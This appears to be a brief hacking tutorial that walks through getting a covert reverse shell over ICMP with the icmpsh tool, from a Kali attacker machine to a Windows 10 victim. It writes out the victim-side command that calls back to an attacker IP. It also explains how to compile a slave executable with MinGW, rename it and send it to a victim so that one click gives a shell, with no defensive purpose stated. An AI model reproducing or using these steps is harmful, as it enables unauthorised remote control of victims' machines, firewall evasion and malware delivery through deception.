Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as great convert channel to get victim shell access using ICMP Shell.
Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)
- Download the ICMP SHELL tool Here
- execute command ./run.sh shell script with 777 Permissions ( read,write,execute)
- The output of shell script command will give a piece of code icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
- Upload “icmpsh.exe” on the victim machine.
- Run CMD and Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as listener.
- Here Listener script will be icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
- Execute this with CMD & No admin privileges needed.
BACK TO ATTACKERS MACHINE:-
- Once the Listener is executed on my windows 10 victim machine, Here we got a shell with ICMP.
- So we can start our command and control of victim pc.
- So only, ICMP requests/responses traffic only sent via attackers machine to victims machine.
VICTIMS CLICK & SHELL ACCESS:-
- If you want to compromise victim directly by click, you can download c code here
- After download compile the c code with directly with known victim IP and Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
- Now you can Rename icmp-slave-complete.exe and send to the victim.SHELL SHELL SHELL !!!